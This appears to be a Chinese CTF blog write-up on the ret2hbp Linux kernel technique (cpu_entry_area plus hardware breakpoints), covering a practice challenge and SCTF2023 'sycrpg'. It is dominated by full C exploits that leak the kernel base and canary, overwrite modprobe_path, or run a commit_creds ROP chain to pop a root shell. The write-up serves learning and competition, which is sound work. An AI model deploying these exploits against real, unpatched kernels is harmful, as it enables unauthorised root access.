XiaozaYa
XiaozaYa

【ret2hbp】一道板子测试题 和 SCTF2023 - sycrpg

前言

ret2hbp 主要是利用在内核版本 v6.2.0 之前,cpu_entry_area mapping 区域没有参与随机化的利用。其主要针对的场景如下:

1)存在任意地址读,泄漏内核地址

2)存在无数次任意地址写,泄漏内核地址并提权

这里仅仅记录题目,具体原理请读者自行查阅资料,这里给一些参考链接:

一种借助硬件断点的提权思路分析与演示 板子题也是这个大佬写的

https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html

板子题

保护:smep、smap、kalsr、pti都开了

漏洞如下:无数次任意地址写8字节

【ret2hbp】一道板子测试题 和 SCTF2023 - sycrpg_第1张图片

modprobe_path 直接打

exp 如下:这里在泄漏完kernel_offset后直接利用任意写打modprobe_path,这里取巧了

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}


#define DF_OFFSET(dr) ((void*)(&((struct user*)0)->u_debugreg[dr]))
#define CPU_ENTRY_AREA_DB_STACK_RCX_ADDR 0xfffffe0000010fb0
#define MMAP_ADDR 0x12340000
#define MMAP_SIZE 0x2000
int fd;
int pipe_fd[2];

struct arg { uint64_t addr; uint64_t val };

void arb_write(uint64_t addr, uint64_t val)
{
        struct arg arg = { .addr = addr, .val = val };
        ioctl(fd, 0, &arg);
}

void set_hbp(pid_t pid, void* addr)
{
        if (ptrace(PTRACE_POKEUSER, pid, DF_OFFSET(0), addr))
                err_exit("ptrace PTRACE_POKEUSER for dr0 in set_hbp");

        long dr7 = (1<<0)|(1<<8)|(1<<16)|(1<<17)|(1<<18)|(1<<19);
        if (ptrace(PTRACE_POKEUSER, pid, DF_OFFSET(7), dr7))
                err_exit("ptrace PTRACE_POKEUSER for dr7 in set_hbp");
}

void do_trigger_hbp()
{
        bind_core(0);
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL))
                err_exit("ptrace PTRACE_TRACEME in do trigger hbp");

        struct utsname* uts = (struct utsname*)MMAP_ADDR;
        int oob_idx = (sizeof(struct utsname) + sizeof(uint64_t) - 1) / sizeof(uint64_t);

        while (1)
        {
                raise(SIGSTOP);
                uname(uts);
                if (((uint64_t*)uts)[oob_idx])
                {
                        puts("[+] OOB Read Stack Data Successfully");
                        write(pipe_fd[1], MMAP_ADDR, MMAP_SIZE);
                        break;
                }
        }

}

void do_change_cx()
{
        bind_core(1);
        puts("[+] write cpu_entry_area DB_STACK -> rcx");
        while (1)
        {
                arb_write(CPU_ENTRY_AREA_DB_STACK_RCX_ADDR, 0x400/8);
        }
}

void get_flag(){
        system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x"); // modeprobe_path 修改为了 /tmp/x
        system("chmod +x /tmp/x");
        system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy"); // 非法格式的二进制文件
        system("chmod +x /tmp/dummy");
        system("/tmp/dummy"); // 执行非法格式的二进制文件 ==> 执行 modeprobe_path 指向的文件 /tmp/x
        sleep(0.3);
        system("cat /flag");
        exit(0);
}

int main(int argc, char** argv, char** envp)
{
        fd = open("/dev/vuln", O_RDONLY);
        if (fd < 0) err_exit("open dev file");

        if (mmap(MMAP_ADDR, MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) == MAP_FAILED)
                err_exit("mmap MMAP_ADDR");

        pipe(pipe_fd);
        pid_t pid1, pid2;
        puts("[+] fork a process to trigger hbp");
        pid1 = fork();
        if (!pid1)
        {
                do_trigger_hbp();
                exit(0);
        } else if (pid1 < 0) {
                err_exit("fork a trigger hbp process");
        } else {
                waitpid(pid1, NULL, NULL);
        }

        pid2 = fork();
        if (!pid2)
        {
                do_change_cx();
                exit(0);
        } else if (pid2 < 0) {
                err_exit("fork a trigger hbp process");
        }

        set_hbp(pid1, MMAP_ADDR);
        struct pollfd fds = { .fd = pipe_fd[0], .events = POLLIN };
        while (1)
        {
                if (ptrace(PTRACE_CONT, pid1, NULL, NULL))
                        err_exit("ptrace PTRACE_CONT");
                waitpid(pid1, NULL, NULL);

                int res = poll(&fds, 1, 0);
                if (res > 0 && (fds.revents & POLLIN))
                {
                        read(pipe_fd[0], MMAP_ADDR, MMAP_SIZE);
                        break;
                }
        }

        binary_dump("OOB READ STACK DTA", MMAP_ADDR+sizeof(struct utsname), 0x100);
        uint64_t* leak_data = MMAP_ADDR+sizeof(struct utsname);
        uint64_t kbase = leak_data[4] - 0xe0b32;
        uint64_t modprobe_path = kbase + 0x1e8b920;
        hexx("kbase", kbase);
        hexx("modprobe_path", modprobe_path);

        char cmd[8] = "/tmp/x";
        arb_write(modprobe_path, *(uint64_t*)cmd);
        get_flag();
        puts("[+] EXP NEVER END!");
        return 0;
}

效果如下: 

【ret2hbp】一道板子测试题 和 SCTF2023 - sycrpg_第2张图片

ROP 链提权

但是在大佬 blog 中是直接可以提权的,所以这里尝试提权,这里其实想法挺多了,因为漏洞的品相比较好,所以可以直接考虑修改 ip / rsp,但是这里还是参考原文中的做法,因为 srcrpg 这题是固定地址的任意次1字节写。

提权:这里有两条路径可以打:

【ret2hbp】一道板子测试题 和 SCTF2023 - sycrpg_第3张图片

这里这两个地方都可触发硬件断点,并且dst都是内核栈上的局部变量。

exp 如下:两个路径的利用都在里面,其实区别不大,只是路径2要绕过validate_prctl_map_addr 函数里面的一些检查,但是比较容易绕过

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: \033[0m%#llx\n", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* root checker and shell poper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    asm volatile (
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}


#define DF_OFFSET(dr) ((void*)(&((struct user*)0)->u_debugreg[dr]))
#define CPU_ENTRY_AREA_DB_STACK_RCX_ADDR 0xfffffe0000010fb0
#define MMAP_ADDR 0x12340000
#define MMAP_SIZE 0x2000
int fd;
int pipe_fd[2];
int rop_pipe[2];

struct arg { uint64_t addr; uint64_t val };

void arb_write(uint64_t addr, uint64_t val)
{
        struct arg arg = { .addr = addr, .val = val };
        ioctl(fd, 0, &arg);
}

void set_hbp(pid_t pid, void* addr)
{
        if (ptrace(PTRACE_POKEUSER, pid, DF_OFFSET(0), addr))
                err_exit("ptrace PTRACE_POKEUSER for dr0 in set_hbp");

        long dr7 = (1<<0)|(1<<8)|(1<<16)|(1<<17)|(1<<18)|(1<<19);
        if (ptrace(PTRACE_POKEUSER, pid, DF_OFFSET(7), dr7))
                err_exit("ptrace PTRACE_POKEUSER for dr7 in set_hbp");
}

void do_trigger_hbp()
{
        bind_core(0);
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL))
                err_exit("ptrace PTRACE_TRACEME in do trigger hbp");

        struct utsname* uts = (struct utsname*)MMAP_ADDR;
        int oob_idx = (sizeof(struct utsname) + sizeof(uint64_t) - 1) / sizeof(uint64_t);
        int step = 0;
        while (1)
        {
                raise(SIGSTOP);
                switch (step)
                {
                        case 0:
                        {
                                uname(uts);
                                if (((uint64_t*)uts)[oob_idx])
                                {
                                        puts("[+] OOB Read Stack Data Successfully");
                                        write(pipe_fd[1], MMAP_ADDR, MMAP_SIZE);
                                        step++;
                                }
                        }
                                break;
                        case 1:
                        {
                                puts("[+] Wait for ROP chain");
                                if (read(rop_pipe[0], MMAP_ADDR, MMAP_SIZE) < 0)
                                        err_exit("read ROP chain");
                                puts("[+] Get ROP chain successfully");
                                step++;
                        }
                                break;
                        case 2:
                        {
                                puts("[+] Try to write ROP chain");
                                // path 2
                                struct prctl_mm_map mm_map;
                                mm_map.start_code  = 0x1000000;
                                mm_map.end_code    = 0x1100000;
                                mm_map.start_data  = 0x1000000;
                                mm_map.end_data    = 0x1100000;
                                mm_map.start_brk   = 0x2000000;
                                mm_map.brk         = 0x2000000;
                                mm_map.start_stack = 0x1000000;
                                mm_map.arg_start   = 0x1000000;
                                mm_map.arg_end     = 0x1000000;
                                mm_map.env_start   = 0x1000000;
                                mm_map.env_end     = 0x1000000;
                                mm_map.auxv        = MMAP_ADDR;
                                mm_map.auxv_size   = 0x140;
                                mm_map.exe_fd      = -2;
                                prctl(PR_SET_MM, PR_SET_MM_MAP, &mm_map, sizeof(struct prctl_mm_map), 0);

                                // path 1
//                              prctl(PR_SET_MM, PR_SET_MM_MAP, MMAP_ADDR, sizeof(struct prctl_mm_map), 0);
                        }
                                break;
                        default:
                                break;

                }
        }

}

void do_change_cx()
{
        bind_core(1);
        puts("[+] write cpu_entry_area DB_STACK -> rcx");
        while (1)
        {
                arb_write(CPU_ENTRY_AREA_DB_STACK_RCX_ADDR, 0x10);
        }
}

int main(int argc, char** argv, char** envp)
{
        save_status();
        fd = open("/dev/vuln", O_RDONLY);
        if (fd < 0) err_exit("open dev file");

        if (mmap(MMAP_ADDR, MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) == MAP_FAILED)
                err_exit("mmap MMAP_ADDR");

        pipe(pipe_fd);
        pipe(rop_pipe);
        pid_t pid1, pid2;
        puts("[+] fork a process to trigger hbp");
        pid1 = fork();
        if (!pid1)
        {
                do_trigger_hbp();
                exit(0);
        } else if (pid1 < 0) {
                err_exit("fork a trigger hbp process");
        } else {
                waitpid(pid1, NULL, NULL);
        }

        puts("[+] fork a process to arb_write 'rcx'");
        pid2 = fork();
        if (!pid2)
        {
                do_change_cx();
                exit(0);
        } else if (pid2 < 0) {
                err_exit("fork a trigger hbp process");
        }

        set_hbp(pid1, MMAP_ADDR);
        struct pollfd fds = { .fd = pipe_fd[0], .events = POLLIN };
        while (1)
        {
                if (ptrace(PTRACE_CONT, pid1, NULL, NULL))
                        err_exit("ptrace PTRACE_CONT");
                waitpid(pid1, NULL, NULL);

                int res = poll(&fds, 1, 0);
                if (res > 0 && (fds.revents & POLLIN))
                {
                        read(pipe_fd[0], MMAP_ADDR, MMAP_SIZE);
                        break;
                }
        }

        binary_dump("OOB READ STACK DTA", MMAP_ADDR+sizeof(struct utsname), 0x100);
        uint64_t* leak_data = MMAP_ADDR+sizeof(struct utsname);
        uint64_t canary = leak_data[0];
        uint64_t kbase = leak_data[4] - 0xe0b32;
        uint64_t kernel_offset = kbase - 0xffffffff81000000;
        hexx("canary", canary);
        hexx("kbase", kbase);
        hexx("kernel_offset", kernel_offset);
        // ======== path 1 offset ========
//      int canary_off = 0x3d;
//      int ret_off = 0x44;
        // ===============================

        // ======== path 2 offset ========
        int canary_off = 0x30;
        int ret_off = 0x37;
        // ===============================

        // invalid gadget in data segment
//      size_t pop_rdi = 0xffffffff824b3716 + kernel_offset;
//      size_t pop_rdi = 0xffffffff82984bb7 + kernel_offset; // cld ; pop rdi ; ret
        size_t pop_rdi = 0xffffffff81852a3b + kernel_offset; // add al, ch ; pop rdi ; ret
        size_t init_cred = 0xffffffff82e8a820 + kernel_offset;
        size_t commit_creds = 0xffffffff810f8240 + kernel_offset;
        size_t swapgs_kpti = 0xffffffff820010b0 + 0x36 + kernel_offset;
        hexx("pop_rdi", pop_rdi);
        hexx("init_cred", init_cred);
        hexx("commit_creds", commit_creds);
        hexx("swapgs_kpti", swapgs_kpti);

        uint64_t* rop = (uint64_t*)MMAP_ADDR;
        int i = 0;

        memset(MMAP_ADDR, 0, MMAP_SIZE);
        rop[canary_off] = canary;
        rop[ret_off+i++] = pop_rdi;
        rop[ret_off+i++] = init_cred;
        rop[ret_off+i++] = commit_creds;
        rop[ret_off+i++] = swapgs_kpti;
        rop[ret_off+i++] = 0;
        rop[ret_off+i++] = 0;
        rop[ret_off+i++] = get_root_shell;
        rop[ret_off+i++] = user_cs;
        rop[ret_off+i++] = user_rflags;
        rop[ret_off+i++] = user_sp;
        rop[ret_off+i++] = user_ss;

        write(rop_pipe[1], MMAP_ADDR, MMAP_SIZE);

        while (1)
        {
                if (ptrace(PTRACE_CONT, pid1, NULL, NULL))
                        err_exit("ptrace PTRACE_CONT");
                waitpid(pid1, NULL, NULL);
        }

        puts("[+] EXP NEVER END!");
        return 0;
}

效果如下:可以成功完成提权,而且成功率几乎100%

【ret2hbp】一道板子测试题 和 SCTF2023 - sycrpg_第4张图片

坑点

哭了,害的的调了一整天,脚本早就写好了,但是发现其在copy_from_user里面就直接崩溃了,然后就调试了一整天,第二天早上调了2个小时发现,脚本是能够执行到错误逻辑的,然后猛然发现把 rcx 改的太大了,对内核栈造成了极大的破坏。而且内核栈一般比较小,rcx 太大,可能访问了不能访问的内存页。其实这里我踩过好多坑了,但是就是不长记性。

第2个坑点就是 ROPgadget 找的 gadget 很多都是数据段上,不具备可执行权限,所以程序一种报错,这里很好解决,尽量挑选前面的 gadget,因为一般数据段都在代码段后面。

sycrpg

跟板子题一模一样,这里变成固定地址无数次一字节写,保护该开的都开了。

唯一的区别就是加了个小游戏:让3个check都为1就行了

【ret2hbp】一道板子测试题 和 SCTF2023 - sycrpg_第5张图片

exp 如下:这里开一个线程竞争修改 rcx 就行了,4个和1个没啥区别,单纯不想改了

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: \033[0m%#llx\n", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* root checker and shell poper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    asm volatile (
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}


#define DF_OFFSET(dr) ((void*)(&((struct user*)0)->u_debugreg[dr]))
#define CPU_ENTRY_AREA_DB_STACK_RCX_ADDR 0xfffffe0000010fb0
#define MMAP_ADDR 0x12340000
#define MMAP_SIZE 0x2000
int fd;
int pipe_fd[2];
int rop_pipe[2];


void arb_write(uint64_t val)
{
       if (ioctl(fd, 0x7204, val))
                err_exit("arb_write");
}

void* evil_write_rcx(void* arg)
{
        puts("[+] child pthread to write 'rcx'");
        while (1)
        {
                arb_write(0x10);
        }
}

void init_exp()
{
        ioctl(fd, 0x7201, CPU_ENTRY_AREA_DB_STACK_RCX_ADDR);

        ioctl(fd, 0x7202, 1);
        for (int i = 0; i < 0x100; i++)
                ioctl(fd, 0x7203, 0);

        for (int i = 0; i < 0x50; i++)
        {
                ioctl(fd, 0x7202, 1);
                ioctl(fd, 0x7202, 2);
        }

        ioctl(fd, 0x7203, 1);
        ioctl(fd, 0x7203, 2);
        pthread_t thr0, thr1, thr2, thr3;
        pthread_create(&thr0, NULL, evil_write_rcx, NULL);
        pthread_create(&thr1, NULL, evil_write_rcx, NULL);
        pthread_create(&thr2, NULL, evil_write_rcx, NULL);
        pthread_create(&thr3, NULL, evil_write_rcx, NULL);

}


void set_hbp(pid_t pid, void* addr)
{
        if (ptrace(PTRACE_POKEUSER, pid, DF_OFFSET(0), addr))
                err_exit("ptrace PTRACE_POKEUSER for dr0 in set_hbp");

        long dr7 = (1<<0)|(1<<8)|(1<<16)|(1<<17)|(1<<18)|(1<<19);
        if (ptrace(PTRACE_POKEUSER, pid, DF_OFFSET(7), dr7))
                err_exit("ptrace PTRACE_POKEUSER for dr7 in set_hbp");
}

void do_trigger_hbp()
{
        bind_core(0);
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL))
                err_exit("ptrace PTRACE_TRACEME in do trigger hbp");

        struct utsname* uts = (struct utsname*)MMAP_ADDR;
        int oob_idx = (sizeof(struct utsname) + sizeof(uint64_t) - 1) / sizeof(uint64_t);
        int step = 0;
        while (1)
        {
                raise(SIGSTOP);
                switch (step)
                {
                        case 0:
                        {
//                              puts("uname ust");
                                uname(uts);
                                if (((uint64_t*)uts)[oob_idx])
                                {
                                        puts("[+] OOB Read Stack Data Successfully");
                                        write(pipe_fd[1], MMAP_ADDR, MMAP_SIZE);
                                        step++;
                                        break;
                                }
                        }
                                break;
                        case 1:
                        {
                                puts("[+] Wait for ROP chain");
                                if (read(rop_pipe[0], MMAP_ADDR, MMAP_SIZE) < 0)
                                        err_exit("read ROP chain");
                                puts("[+] Get ROP chain successfully");
                                step++;
                        }
                                break;
                        case 2:
                        {
                                puts("[+] Try to write ROP chain");
                                prctl(PR_SET_MM, PR_SET_MM_MAP, MMAP_ADDR, sizeof(struct prctl_mm_map), 0);
                        }
                                break;
                        default:
                                break;

                }
        }

}

void do_change_cx()
{
        bind_core(1);
        puts("[+] write cpu_entry_area DB_STACK -> rcx");
        while (1)
        {
//              puts("WRITE rcx");
                arb_write(0x10);
        }
}

int main(int argc, char** argv, char** envp)
{
        save_status();
        fd = open("/dev/seven", O_RDWR);
        if (fd < 0) err_exit("open dev file");
        init_exp();

        if (mmap(MMAP_ADDR, MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0) == MAP_FAILED)
                err_exit("mmap MMAP_ADDR");

        pipe(pipe_fd);
        pipe(rop_pipe);
        pid_t pid;

        puts("[+] fork a process to trigger hbp");
        pid = fork();
        if (!pid)
        {
                do_trigger_hbp();
                exit(0);
        } else if (pid < 0) {
                err_exit("fork a trigger hbp process");
        } else {
                waitpid(pid, NULL, NULL);
        }

        set_hbp(pid, MMAP_ADDR);
        struct pollfd fds = { .fd = pipe_fd[0], .events = POLLIN };
        while (1)
        {
                if (ptrace(PTRACE_CONT, pid, NULL, NULL))
                        err_exit("ptrace PTRACE_CONT");
                waitpid(pid, NULL, NULL);

                int res = poll(&fds, 1, 0);
                if (res > 0 && (fds.revents & POLLIN))
                {
                        read(pipe_fd[0], MMAP_ADDR, MMAP_SIZE);
                        break;
                }
        }

        binary_dump("OOB READ STACK DTA", MMAP_ADDR+sizeof(struct utsname), 0x100);
        uint64_t* leak_data = MMAP_ADDR+sizeof(struct utsname);
        uint64_t canary = leak_data[0];
        uint64_t kbase = leak_data[4] - 0xd7182;
        uint64_t koffset = kbase - 0xffffffff81000000;
        hexx("canary", canary);
        hexx("kbase", kbase);
        hexx("koffset", koffset);

        int canary_off = 0x3d;
        int ret_off = 0x44;
        size_t pop_rdi = koffset + 0xffffffff8108ab12; // pop rdi ; ret
        size_t init_cred = koffset + 0xffffffff82e8abe0;
        size_t commit_creds = koffset + 0xffffffff810eeec0;
        size_t swapgs_kpti = koffset + 0xffffffff81e010b0 + 0x36;
        hexx("pop_rdi", pop_rdi);
        hexx("init_cred", init_cred);
        hexx("commit_creds", commit_creds);
        hexx("swapgs_kpti", swapgs_kpti);

        uint64_t* rop = (uint64_t*)MMAP_ADDR;
        int i = 0;

        memset(MMAP_ADDR, 0, MMAP_SIZE);
        rop[canary_off] = canary;
        rop[ret_off+i++] = pop_rdi;
        rop[ret_off+i++] = init_cred;
        rop[ret_off+i++] = commit_creds;
        rop[ret_off+i++] = swapgs_kpti;
        rop[ret_off+i++] = 0;
        rop[ret_off+i++] = 0;
        rop[ret_off+i++] = get_root_shell;
        rop[ret_off+i++] = user_cs;
        rop[ret_off+i++] = user_rflags;
        rop[ret_off+i++] = user_sp;
        rop[ret_off+i++] = user_ss;

        write(rop_pipe[1], MMAP_ADDR, MMAP_SIZE);

        while (1)
        {
                if (ptrace(PTRACE_CONT, pid, NULL, NULL))
                        err_exit("ptrace PTRACE_CONT");
                waitpid(pid, NULL, NULL);
        }

        puts("[+] EXP NEVER END!");
        return 0;
}

效果如下:

【ret2hbp】一道板子测试题 和 SCTF2023 - sycrpg_第6张图片

大坑比

这题算是把我搞惨了,本打算搞完就去做实验的,结果搞了一天,操。原因是啥呢?题目 qemu 启动脚本没有设置 cpu 核心数量,所以默认为 1,所以这里的多进程,多线程竞争就是假的,纯纯单 CPU 模拟的。TM的调了一天,最后才发现,然后问了一下群里的师傅,师傅说比赛的时候出题人说了这个问题......

你可能感兴趣的:(kernel-pwn,ret2hbp)

  • 【ret2hbp】一道板子测试题 和 SCTF2023 - sycrpg XiaozaYa kernel-pwnret2hbp
    前言ret2hbp主要是利用在内核版本v6.2.0之前,cpu_entry_areamapping区域没有参与随机化的利用。其主要针对的场景如下:1)存在任意地址读,泄漏内核地址2)存在无数次任意地址写,泄漏内核地址并提权这里仅仅记录题目,具体原理请读者自行查阅资料,这里给一些参考链接:一种借助硬件断点的提权思路分析与演示板子题也是这个大佬写的https://googleprojectzero.b
  • 【无数次任意地址读+栈溢出】ImaginaryCTF2023 -- opportunity XiaozaYa kernel-pwn任意读+栈溢出
    前言本题不难,但感觉笔者的做法挺有意思(嘿嘿,自夸啦),利用到了最近学到的ret2hbp。漏洞分析保护:smap等都开了,标配啦>_#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#inclu
  • kernel-pwn学习(1)--环境搭建 azraelxuemo kernel-pwnlinux
    文章目录gdbpwndbgqemu虚拟机配置Ropperextract-vmlinuxun-cpiogen-cpio常见的kernel-exploit例子由于本来的deepin系统太卡了,就重新换了一个ubuntu20的系统,那就重新开始配环境吧,有些可能会和用户态的重复gdb这个系统自带就不说了pwndbg我个人比较喜欢用pwndbg,下面配置一下首先需要安装一下gitsudoaptinstal
  • 2023-10-9 XiaozaYa 日记笔记
    今天身体恢复的不错,只是狂流鼻涕,希望明天能够痊愈。今日学习:主要做了一道kernel-pwn,本题已经成功提权了,但是远程一直没有通,害的我搞了一天,搞到晚上9点多都没通,不然还可以学点其他东西的......把操作系统实验的第一次实验报告写的差不多了>_<明日计划:kernel-pwnhousehousehouse,真的要做点题了,现在真是一点题都做不了......当然还是想把那题远程打通,如果
  • 2023-10-4 XiaozaYa 日记笔记
    呜呜呜,每日一感叹,我真是废物,又是摆烂的一天捏今日学习:主要就是复习了下userfaultfd的利用,然后学习了ldt_struct结构体的利用,做了几道kernel-pwn的题目,然后就没了明日计划:打算再把RWCTF2023体验赛-Diggingintokernel3做一遍,主要跟着ctf-wiki把user_key_payload和pipe_buffer这两个结构体学习一下。然后就搞专业课
  • 通过复用TTY结构体实现提权利用 合天网安实验室 漏洞挖掘渗透测试经验分享UAF漏洞漏洞分析漏洞挖掘
    前言UAF是用户态中常见的漏洞,在内核中同样存在UAF漏洞,都是由于对释放后的空间处理不当,导致被释放后的堆块仍然可以使用所造成的漏洞。LK01-3结合题目来看UAF漏洞项目地址:https://github.com/h0pe-ay/Kernel-Pwn/tree/master/LK01-3open模块在执行open模块时会分配0x400大小的堆空间,并将地址存储在g_buf中#defineBUF
  • kernel-pwn之ret2dir利用技巧 合天网安实验室 CTF网络安全经验分享kernel-pwnret2dirCTF
    前言ret2dir是2014年在USENIX发表的一篇论文,该论文提出针对ret2usr提出的SMEP、SMAP等保护的绕过。全称为return-to-direct-mappedmemory,返回直接映射的内存。论文地址:https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-kemerlis.pdfr
  • First Kernel-pwn aoque9909
    Kernelpwn-极简题目的操作模式完全参照M4x师傅的指导,用hacklu的babykernel迈了第一步题目附带文件说明一般题目会给出bzImage,.cpio,.sh文件sh文件适用于启动kernel的shell脚本文件,参数决定了内核的保护情况。.cpio文件为文件系统映像。将其解压可以获得服务器交互程序的客户端bzImage为kernelbinary,可视为压缩后的文件vmlinux文
  • java数字签名三种方式 知了ing javajdk
    以下3钟数字签名都是基于jdk7的 1,RSA String password="test"; // 1.初始化密钥 KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA"); keyPairGenerator.initialize(51
  • Hibernate学习笔记 caoyong Hibernate
    1>、Hibernate是数据访问层框架,是一个ORM(Object Relation Mapping)框架,作者为:Gavin King 2>、搭建Hibernate的开发环境      a>、添加jar包:      aa>、hibernatte开发包中/lib/required/所
  • 设计模式之装饰器模式Decorator(结构型) 漂泊一剑客 Decorator
    1. 概述        若你从事过面向对象开发,实现给一个类或对象增加行为,使用继承机制,这是所有面向对象语言的一个基本特性。如果已经存在的一个类缺少某些方法,或者须要给方法添加更多的功能(魅力),你也许会仅仅继承这个类来产生一个新类—这建立在额外的代码上。      
  • 读取磁盘文件txt,并输入String 一炮送你回车库 String
    public static void main(String[] args) throws IOException {    String fileContent = readFileContent("d:/aaa.txt");    System.out.println(fileContent);   
  • js三级联动下拉框 3213213333332132 三级联动
    //三级联动 省/直辖市<select id="province"></select> 市/省直辖<select id="city"></select> 县/区 <select id="area"></select>
  • erlang之parse_transform编译选项的应用 616050468 parse_transform游戏服务器属性同步abstract_code
             最近使用erlang重构了游戏服务器的所有代码,之前看过C++/lua写的服务器引擎代码,引擎实现了玩家属性自动同步给前端和增量更新玩家数据到数据库的功能,这也是现在很多游戏服务器的优化方向,在引擎层面去解决数据同步和数据持久化,数据发生变化了业务层不需要关心怎么去同步给前端。由于游戏过程中玩家每个业务中玩家数据更改的量其实是很少
  • JAVA JSON的解析 darkranger java
    // { // “Total”:“条数”, // Code: 1, // // “PaymentItems”:[ // { // “PaymentItemID”:”支款单ID”, // “PaymentCode”:”支款单编号”, // “PaymentTime”:”支款日期”, // ”ContractNo”:”合同号”, //
